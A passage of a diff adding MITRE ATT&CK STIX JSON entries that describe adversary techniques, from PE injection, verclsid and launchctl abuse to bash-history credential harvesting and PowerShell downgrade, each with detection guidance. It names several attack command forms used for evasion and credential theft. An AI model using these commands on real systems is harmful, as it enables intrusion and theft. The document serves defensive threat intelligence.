already resides in a local registry, the pull may be considered even less suspicious since the image is already in the environment. ", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_contributors": [ + "Assaf Morag, @MoragAssaf, Team Nautilus Aqua Security", + "Roi Kol, @roykol1, Team Nautilus Aqua Security", + "Michael Katchinskiy, @michael64194968, Team Nautilus Aqua Security", + "Vishwas Manral, McAfee" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Monitor for unexpected Docker image build requests to the Docker daemon on hosts in the environment. Additionally monitor for subsequent network communication with anomalous IPs that have never been seen before in the environment that indicate the download of malicious code.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Containers" + ], + "x_mitre_version": "1.3", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--800f9819-7007-4540-a520-40e655876800", + "created": "2021-03-30T17:54:03.944Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1612", + "external_id": "T1612" + }, + { + "source_name": "Aqua Build Images on Hosts", + "description": "Assaf Morag. (2020, July 15). Threat Alert: Attackers Building Malicious Images on Your Hosts. Retrieved March 29, 2021.", + "url": "https://blog.aquasec.com/malicious-container-image-docker-container-host" + }, + { + "source_name": "Docker Build Image", + "description": "Docker. ( null). Docker Engine API v1.41 Reference - Build an Image. Retrieved March 30, 2021.", + "url": "https://docs.docker.com/engine/api/v1.41/#operation/ImageBuild" + }, + { + "source_name": "Aqua Security Cloud Native Threat Report June 2021", + "description": "Team Nautilus. (2021, June). Attacks in the Wild on the Container Supply Chain and Infrastructure. Retrieved August 26, 2021.", + "url": "https://info.aquasec.com/hubfs/Threat%20reports/AquaSecurity_Cloud_Native_Threat_Report_2021.pdf?utm_campaign=WP%20-%20Jun2021%20Nautilus%202021%20Threat%20Research%20Report&utm_medium=email&_hsmi=132931006&_hsenc=p2ANqtz-_8oopT5Uhqab8B7kE0l3iFo1koirxtyfTehxF7N-EdGYrwk30gfiwp5SiNlW3G0TNKZxUcDkYOtwQ9S6nNVNyEO-Dgrw&utm_content=132931006&utm_source=hs_automation" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2021-04-29T14:49:39.188Z", + "name": "Shared Webroot", + "description": "**This technique has been deprecated and should no longer be used.**\n\nAdversaries may add malicious content to an internally accessible website through an open network file share that contains the website's webroot or Web content directory (Citation: Microsoft Web Root OCT 2016) (Citation: Apache Server 2018) and then browse to that content with a Web browser to cause the server to execute the malicious content. The malicious content will typically run under the context and permissions of the Web server process, often resulting in local system or administrative privileges, depending on how the Web server is configured.\n\nThis mechanism of shared access and remote execution could be used for lateral movement to the system running the Web server. For example, a Web server running PHP with an open network share could allow an adversary to upload a remote access tool and PHP script to execute the RAT on the system running the Web server when a specific page is visited. (Citation: Webroot PHP 2011)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "lateral-movement" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [], + "x_mitre_deprecated": true, + "x_mitre_detection": "Use file and process monitoring to detect when files are written to a Web server by a process that is not the normal Web server process or when files are written outside of normal administrative time periods. Use process monitoring to identify normal processes that run on the Web server and detect processes that are not typically executed.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [], + "x_mitre_system_requirements": [ + "Shared webroot directory on remote system" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--804c042c-cfe6-449e-bc1a-ba0a998a70db", + "created": "2017-05-31T21:30:46.047Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1051", + "external_id": "T1051" + }, + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/563.html", + "external_id": "CAPEC-563" + }, + { + "source_name": "Microsoft Web Root OCT 2016", + "description": "Microsoft. (2016, October 20). How to: Find the Web Application Root. Retrieved July 27, 2018." + }, + { + "source_name": "Apache Server 2018", + "description": "Apache. (n.d.). Apache HTTP Server Version 2.4 Documentation - Web Site Content. Retrieved July 27, 2018.", + "url": "http://httpd.apache.org/docs/2.4/getting-started.html#content" + }, + { + "source_name": "Webroot PHP 2011", + "description": "Brandt, Andrew. (2011, February 22). Malicious PHP Scripts on the Rise. Retrieved October 3, 2018.", + "url": "https://www.webroot.com/blog/2011/02/22/malicious-php-scripts-on-the-rise/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-04-25T14:00:00.188Z", + "name": "Portable Executable Injection", + "description": "Adversaries may inject portable executables (PE) into processes in order to evade process-based defenses as well as possibly elevate privileges. PE injection is a method of executing arbitrary code in the address space of a separate live process. \n\nPE injection is commonly performed by copying code (perhaps without a file on disk) into the virtual address space of the target process before invoking it via a new thread. The write can be performed with native Windows API calls such as VirtualAllocEx and WriteProcessMemory, then invoked with CreateRemoteThread or additional code (ex: shellcode). The displacement of the injected code does introduce the additional requirement for functionality to remap memory references. (Citation: Elastic Process Injection July 2017) \n\nRunning code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via PE injection may also evade detection from security products since the execution is masked under a legitimate process. ", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "privilege-escalation" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [], + "x_mitre_detection": "Monitoring Windows API calls indicative of the various types of code injection may generate a significant amount of data and may not be directly useful for defense unless collected under specific circumstances for known bad sequences of calls, since benign use of API functions may be common and difficult to distinguish from malicious behavior. Windows API calls such as CreateRemoteThread and those that can be used to modify memory within another process, such as VirtualAllocEx/WriteProcessMemory, may be used for this technique.(Citation: Elastic Process Injection July 2017)\n\nAnalyze process behavior to determine if a process is performing actions it usually does not, such as opening network connections, reading files, or other suspicious actions that could relate to post-compromise behavior. ", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [], + "x_mitre_defense_bypassed": [ + "Anti-virus", + "Application control" + ], + "x_mitre_permissions_required": [ + "User" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--806a49c4-970d-43f9-9acc-ac0ee11e6662", + "created": "2020-01-14T01:27:31.344Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1055/002", + "external_id": "T1055.002" + }, + { + "source_name": "Elastic Process Injection July 2017", + "description": "Hosseini, A. (2017, July 18). Ten Process Injection Techniques: A Technical Survey Of Common And Trending Process Injection Techniques. Retrieved December 7, 2017.", + "url": "https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-10-25T14:00:00.188Z", + "name": "Verclsid", + "description": "Adversaries may abuse verclsid.exe to proxy execution of malicious code. Verclsid.exe is known as the Extension CLSID Verification Host and is responsible for verifying each shell extension before they are used by Windows Explorer or the Windows Shell.(Citation: WinOSBite verclsid.exe)\n\nAdversaries may abuse verclsid.exe to execute malicious payloads. This may be achieved by running verclsid.exe /S /C {CLSID}, where the file is referenced by a Class ID (CLSID), a unique identification number used to identify COM objects. COM payloads executed by verclsid.exe may be able to perform various malicious actions, such as loading and executing COM scriptlets (SCT) from remote servers (similar to [Regsvr32](https://attack.mitre.org/techniques/T1218/010)). Since the binary may be signed and/or native on Windows systems, proxying execution via verclsid.exe may bypass application control solutions that do not account for its potential abuse.(Citation: LOLBAS Verclsid)(Citation: Red Canary Verclsid.exe)(Citation: BOHOPS Abusing the COM Registry)(Citation: Nick Tyrer GitHub) ", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [ + "Rodrigo Garcia, Red Canary" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Use process monitoring to monitor the execution and arguments of verclsid.exe. Compare recent invocations of verclsid.exe with prior history of known good arguments and loaded files to determine anomalous and potentially adversarial activity. Command arguments used before and after the invocation of verclsid.exe may also be useful in determining the origin and purpose of the payload being executed. Depending on the environment, it may be unusual for verclsid.exe to have a parent process of a Microsoft Office product. It may also be unusual for verclsid.exe to have any child processes or to make network connections or file modifications.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "2.0", + "x_mitre_data_sources": [], + "x_mitre_defense_bypassed": [ + "Application control", + "Digital Certificate Validation" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--808e6329-ca91-4b87-ac2d-8eadc5f8f327", + "created": "2020-08-10T13:59:38.443Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1218/012", + "external_id": "T1218.012" + }, + { + "source_name": "BOHOPS Abusing the COM Registry", + "description": "BOHOPS. (2018, August 18). Abusing the COM Registry Structure (Part 2): Hijacking & Loading Techniques. Retrieved August 10, 2020.", + "url": "https://bohops.com/2018/08/18/abusing-the-com-registry-structure-part-2-loading-techniques-for-evasion-and-persistence/" + }, + { + "source_name": "Red Canary Verclsid.exe", + "description": "Haag, M., Levan, K. (2017, April 6). Old Phishing Attacks Deploy a New Methodology: Verclsid.exe. Retrieved August 10, 2020.", + "url": "https://redcanary.com/blog/verclsid-exe-threat-detection/" + }, + { + "source_name": "LOLBAS Verclsid", + "description": "LOLBAS. (n.d.). Verclsid.exe. Retrieved August 10, 2020.", + "url": "https://lolbas-project.github.io/lolbas/Binaries/Verclsid/" + }, + { + "source_name": "Nick Tyrer GitHub", + "description": "Tyrer, N. (n.d.). Instructions. Retrieved August 10, 2020.", + "url": "https://gist.github.com/NickTyrer/0598b60112eaafe6d07789f7964290d5" + }, + { + "source_name": "WinOSBite verclsid.exe", + "description": "verclsid-exe. (2019, December 17). verclsid.exe File Information - What is it & How to Block . Retrieved August 10, 2020.", + "url": "https://www.winosbite.com/verclsid-exe/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-05-09T14:00:00.188Z", + "name": "Compromise Accounts", + "description": "Adversaries may compromise accounts with services that can be used during targeting. For operations incorporating social engineering, the utilization of an online persona may be important. Rather than creating and cultivating accounts (i.e. [Establish Accounts](https://attack.mitre.org/techniques/T1585)), adversaries may compromise existing accounts. Utilizing an existing persona may engender a level of trust in a potential victim if they have a relationship, or knowledge of, the compromised persona. \n\nA variety of methods exist for compromising accounts, such as gathering credentials via [Phishing for Information](https://attack.mitre.org/techniques/T1598), purchasing credentials from third-party sites, brute forcing credentials (ex: password reuse from breach credential dumps), or paying employees, suppliers or business partners for access to credentials.(Citation: AnonHBGary)(Citation: Microsoft DEV-0537) Prior to compromising accounts, adversaries may conduct Reconnaissance to inform decisions about which accounts to compromise to further their operation.\n\nPersonas may exist on a single site or across multiple sites (ex: Facebook, LinkedIn, Twitter, Google, etc.). Compromised accounts may require additional development, this could include filling out or modifying profile information, further developing social networks, or incorporating photos.\n\nAdversaries may directly leverage compromised email accounts for [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Phishing](https://attack.mitre.org/techniques/T1566).", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "resource-development" + } + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_contributors": [], + "x_mitre_deprecated": false, + "x_mitre_detection": "Consider monitoring social media activity related to your organization. Suspicious activity may include personas claiming to work for your organization or recently modified accounts making numerous connection requests to accounts affiliated with your organization.\n\nMuch of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access (ex: [Phishing](https://attack.mitre.org/techniques/T1566)).", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "PRE" + ], + "x_mitre_version": "1.2", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--81033c3b-16a4-46e4-8fed-9b030dd03c4a", + "created": "2020-10-01T01:17:15.965Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1586", + "external_id": "T1586" + }, + { + "source_name": "AnonHBGary", + "description": "Bright, P. (2011, February 15). Anonymous speaks: the inside story of the HBGary hack. Retrieved March 9, 2017.", + "url": "https://arstechnica.com/tech-policy/2011/02/anonymous-speaks-the-inside-story-of-the-hbgary-hack/" + }, + { + "source_name": "Microsoft DEV-0537", + "description": "Microsoft. (2022, March 22). DEV-0537 criminal actor targeting organizations for data exfiltration and destruction. Retrieved March 23, 2022.", + "url": "https://www.microsoft.com/security/blog/2022/03/22/dev-0537-criminal-actor-targeting-organizations-for-data-exfiltration-and-destruction/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-04-25T14:00:00.188Z", + "name": "Launchctl", + "description": "Adversaries may abuse launchctl to execute commands or programs. Launchctl interfaces with launchd, the service management framework for macOS. Launchctl supports taking subcommands on the command-line, interactively, or even redirected from standard input.(Citation: Launchctl Man)\n\nAdversaries use launchctl to execute commands and programs as [Launch Agent](https://attack.mitre.org/techniques/T1543/001)s or [Launch Daemon](https://attack.mitre.org/techniques/T1543/004)s. Common subcommands include: launchctl load,launchctl unload, and launchctl start. Adversaries can use scripts or manually run the commands launchctl load -w \"%s/Library/LaunchAgents/%s\" or /bin/launchctl load to execute [Launch Agent](https://attack.mitre.org/techniques/T1543/001)s or [Launch Daemon](https://attack.mitre.org/techniques/T1543/004)s.(Citation: Sofacy Komplex Trojan)(Citation: 20 macOS Common Tools and Techniques)\n", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "execution" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [], + "x_mitre_detection": "Every Launch Agent and Launch Daemon must have a corresponding plist file on disk which can be monitored. Monitor for recently modified or created plist files with a significant change to the executable path executed with the command-line launchctl command. Plist files are located in the root, system, and users /Library/LaunchAgents or /Library/LaunchDaemons folders. \n\nMonitor command-line execution of the launchctl command immediately followed by abnormal network connections. [Launch Agent](https://attack.mitre.org/techniques/T1543/001)s or [Launch Daemon](https://attack.mitre.org/techniques/T1543/004)s with executable paths pointing to /tmp and /Shared folders locations are potentially suspicious. \n\nWhen removing [Launch Agent](https://attack.mitre.org/techniques/T1543/001)s or [Launch Daemon](https://attack.mitre.org/techniques/T1543/004)s ensure the services are unloaded prior to deleting plist files.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "macOS" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [], + "x_mitre_permissions_required": [ + "User", + "root" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--810aa4ad-61c9-49cb-993f-daa06199421d", + "created": "2020-03-10T18:26:56.187Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1569/001", + "external_id": "T1569.001" + }, + { + "source_name": "Launchctl Man", + "description": "SS64. (n.d.). launchctl. Retrieved March 28, 2020.", + "url": "https://ss64.com/osx/launchctl.html" + }, + { + "source_name": "Sofacy Komplex Trojan", + "description": "Dani Creus, Tyler Halfpop, Robert Falcone. (2016, September 26). Sofacy's 'Komplex' OS X Trojan. Retrieved July 8, 2017.", + "url": "https://researchcenter.paloaltonetworks.com/2016/09/unit42-sofacys-komplex-os-x-trojan/" + }, + { + "source_name": "20 macOS Common Tools and Techniques", + "description": "Phil Stokes. (2021, February 16). 20 Common Tools & Techniques Used by macOS Threat Actors & Malware. Retrieved August 23, 2021.", + "url": "https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-05-11T14:00:00.188Z", + "name": "Botnet", + "description": "Adversaries may compromise numerous third-party systems to form a botnet that can be used during targeting. A botnet is a network of compromised systems that can be instructed to perform coordinated tasks.(Citation: Norton Botnet) Instead of purchasing/renting a botnet from a booter/stresser service, adversaries may build their own botnet by compromising numerous third-party systems.(Citation: Imperva DDoS for Hire) Adversaries may also conduct a takeover of an existing botnet, such as redirecting bots to adversary-controlled C2 servers.(Citation: Dell Dridex Oct 2015) With a botnet at their disposal, adversaries may perform follow-on activity such as large-scale [Phishing](https://attack.mitre.org/techniques/T1566) or Distributed Denial of Service (DDoS).", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "resource-development" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [], + "x_mitre_deprecated": false, + "x_mitre_detection": "Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during [Phishing](https://attack.mitre.org/techniques/T1566), [Endpoint Denial of Service](https://attack.mitre.org/techniques/T1499), or [Network Denial of Service](https://attack.mitre.org/techniques/T1498).", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "PRE" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--810d8072-afb6-4a56-9ee7-86379ac4a6f3", + "created": "2020-10-01T00:58:35.269Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1584/005", + "external_id": "T1584.005" + }, + { + "source_name": "Dell Dridex Oct 2015", + "description": "Dell SecureWorks Counter Threat Unit Threat Intelligence. (2015, October 13). Dridex (Bugat v5) Botnet Takeover Operation. Retrieved May 31, 2019.", + "url": "https://www.secureworks.com/research/dridex-bugat-v5-botnet-takeover-operation" + }, + { + "source_name": "Imperva DDoS for Hire", + "description": "Imperva. (n.d.). Booters, Stressers and DDoSers. Retrieved October 4, 2020.", + "url": "https://www.imperva.com/learn/ddos/booters-stressers-ddosers/" + }, + { + "source_name": "Norton Botnet", + "description": "Norton. (n.d.). What is a botnet?. Retrieved October 4, 2020.", + "url": "https://us.norton.com/internetsecurity-malware-what-is-a-botnet.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-05-11T14:00:00.188Z", + "name": "Network Device CLI", + "description": "Adversaries may abuse scripting or built-in command line interpreters (CLI) on network devices to execute malicious command and payloads. The CLI is the primary means through which users and administrators interact with the device in order to view system information, modify device operations, or perform diagnostic and administrative functions. CLIs typically contain various permission levels required for different commands. \n\nScripting interpreters automate tasks and extend functionality beyond the command set included in the network OS. The CLI and scripting interpreter are accessible through a direct console connection, or through remote means, such as telnet or [SSH](https://attack.mitre.org/techniques/T1021/004).\n\nAdversaries can use the network CLI to change how network devices behave and operate. The CLI may be used to manipulate traffic flows to intercept or manipulate data, modify startup configuration parameters to load malicious system software, or to disable security features or logging to avoid detection.(Citation: Cisco Synful Knock Evolution)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "execution" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [], + "x_mitre_deprecated": false, + "x_mitre_detection": "Consider reviewing command history in either the console or as part of the running memory to determine if unauthorized or suspicious commands were used to modify device configuration.(Citation: Cisco IOS Software Integrity Assurance - Command History)\n\nConsider comparing a copy of the network device configuration against a known-good version to discover unauthorized changes to the command interpreter. The same process can be accomplished through a comparison of the run-time memory, though this is non-trivial and may require assistance from the vendor.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Network" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [], + "x_mitre_remote_support": true, + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--818302b2-d640-477b-bf88-873120ce85c4", + "created": "2020-10-20T00:09:33.072Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1059/008", + "external_id": "T1059.008" + }, + { + "source_name": "Cisco IOS Software Integrity Assurance - Command History", + "description": "Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Command History. Retrieved October 21, 2020.", + "url": "https://tools.cisco.com/security/center/resources/integrity_assurance.html#23" + }, + { + "source_name": "Cisco Synful Knock Evolution", + "description": "Graham Holmes. (2015, October 8). Evolution of attacks on Cisco IOS devices. Retrieved October 19, 2020.", + "url": "https://blogs.cisco.com/security/evolution-of-attacks-on-cisco-ios-devices" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-05-11T14:00:00.188Z", + "name": "Bash History", + "description": "Adversaries may search the bash command history on compromised systems for insecurely stored credentials. Bash keeps track of the commands users type on the command-line with the \"history\" utility. Once a user logs out, the history is flushed to the user’s .bash_history file. For each user, this file resides at the same location: ~/.bash_history. Typically, this file keeps track of the user’s last 500 commands. Users often type usernames and passwords on the command-line as parameters to programs, which then get saved to this file when they log out. Adversaries can abuse this by looking through the file for potential credentials. (Citation: External to DA, the OS X Way)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "credential-access" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [], + "x_mitre_detection": "Monitoring when the user's .bash_history is read can help alert to suspicious activity. While users do typically rely on their history of commands, they often access this history through other utilities like \"history\" instead of commands like cat ~/.bash_history.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "macOS" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [], + "x_mitre_permissions_required": [ + "User" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--8187bd2a-866f-4457-9009-86b0ddedffa3", + "created": "2020-02-04T13:02:11.685Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1552/003", + "external_id": "T1552.003" + }, + { + "source_name": "External to DA, the OS X Way", + "description": "Alex Rymdeko-Harvey, Steve Borosh. (2016, May 14). External to DA, the OS X Way. Retrieved July 3, 2017.", + "url": "http://www.slideshare.net/StephanBorosh/external-to-da-the-os-x-way" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-10-03T16:40:15.445Z", + "name": "Downgrade Attack", + "description": "Adversaries may downgrade or use a version of system features that may be outdated, vulnerable, and/or does not support updated security controls. Downgrade attacks typically take advantage of a system’s backward compatibility to force it into less secure modes of operation. \n\nAdversaries may downgrade and use various less-secure versions of features of a system, such as [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059)s or even network protocols that can be abused to enable [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1557) or [Network Sniffing](https://attack.mitre.org/techniques/T1040).(Citation: Praetorian TLS Downgrade Attack 2014) For example, [PowerShell](https://attack.mitre.org/techniques/T1059/001) versions 5+ includes Script Block Logging (SBL) which can record executed script content. However, adversaries may attempt to execute a previous version of PowerShell that does not support SBL with the intent to [Impair Defenses](https://attack.mitre.org/techniques/T1562) while running malicious scripts that may have otherwise been detected.(Citation: CrowdStrike BGH Ransomware 2021)(Citation: Mandiant BYOL 2018)(Citation: att_def_ps_logging)\n\nAdversaries may similarly target network traffic to downgrade from an encrypted HTTPS connection to an unsecured HTTP connection that exposes network data in clear text.(Citation: Targeted SSL Stripping Attacks Are Real)(Citation: Crowdstrike Downgrade)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Mayuresh Dani, Qualys", + "Daniel Feichter, @VirtualAllocEx, Infosec Tirol", + "Arad Inbar, Fidelis Security" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Monitor for commands or other activity that may be indicative of attempts to abuse older or deprecated technologies (ex: powershell –v 2). Also monitor for other abnormal events, such as execution of and/or processes spawning from a version of a tool that is not expected in the environment.\n\nMonitor for Windows event ID (EID) 400, specifically the EngineVersion field which shows the version of PowerShell running and may highlight a malicious downgrade attack.(Citation: inv_ps_attacks)\n\nMonitor network data to detect cases where HTTP is used instead of HTTPS.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows", + "Linux", + "macOS" + ], + "x_mitre_version": "1.2", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--824add00-99a1-4b15-9a2d-6c5683b7b497", + "created": "2021-10-08T14:06:28.212Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1562/010", + "external_id": "T1562.010" + }, + { + "source_name": "Crowdstrike Downgrade", + "description": "Bart Lenaerts-Bergman. (2023, March 14). WHAT ARE DOWNGRADE ATTACKS?. Retrieved May 24, 2023.", + "url": "https://www.crowdstrike.com/cybersecurity-101/attack-types/downgrade-attacks/" + }, + { + "source_name": "Targeted SSL Stripping Attacks Are Real", + "description": "Check Point. (n.d.). Targeted SSL Stripping Attacks Are Real. Retrieved May 24, 2023.", + "url": "https://blog.checkpoint.com/research/targeted-ssl-stripping-attacks-are-real/amp/" + }, + { + "source_name": "CrowdStrike BGH Ransomware 2021", + "description": "Falcon Complete Team. (2021, May 11). Response When Minutes Matter: Rising Up Against Ransomware. Retrieved October 8, 2021.", + "url": "https://www.crowdstrike.com/blog/how-falcon-complete-stopped-a-big-game-hunting-ransomware-attack/" + }, + { + "source_name": "att_def_ps_logging", + "description": "Hao, M. (2019, February 27). Attack and Defense Around PowerShell Event Logging. Retrieved November 24, 2021.", + "url": "https://nsfocusglobal.com/attack-and-defense-around-powershell-event-logging/" + }, + { + "source_name": "inv_ps_attacks", + "description": "Hastings, M. (2014, July 16). Investigating PowerShell Attacks. Retrieved December 1, 2021.", + "url": "https://powershellmagazine.com/2014/07/16/investigating-powershell-attacks/" + }, + { + "source_name": "Mandiant BYOL 2018", + "description": "Kirk, N. (2018, June 18). Bring Your Own Land (BYOL) – A Novel Red Teaming Technique. Retrieved October 8, 2021.", + "url": "https://www.mandiant.com/resources/bring-your-own-land-novel-red-teaming-technique" + }, + { + "source_name": "Praetorian TLS Downgrade Attack 2014", + "description": "Praetorian. (2014, August 19). Man-in-the-Middle TLS Protocol Downgrade Attack. Retrieved October 8, 2021.", + "url": "https://www.praetorian.com/blog/man-in-the-middle-tls-ssl-protocol-downgrade-attack/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-05-24T14:00:00.188Z", + "name": "XPC Services", + "description": "Adversaries can provide malicious content to an XPC service daemon for local code execution. macOS uses XPC services for basic inter-process communication between various processes, such as between the XPC Service daemon and third-party application privileged helper tools. Applications can send messages to the XPC Service daemon, which runs as root, using the low-level XPC Service C API or the high level NSXPCConnection API in order to handle tasks that require elevated privileges (such as network connections). 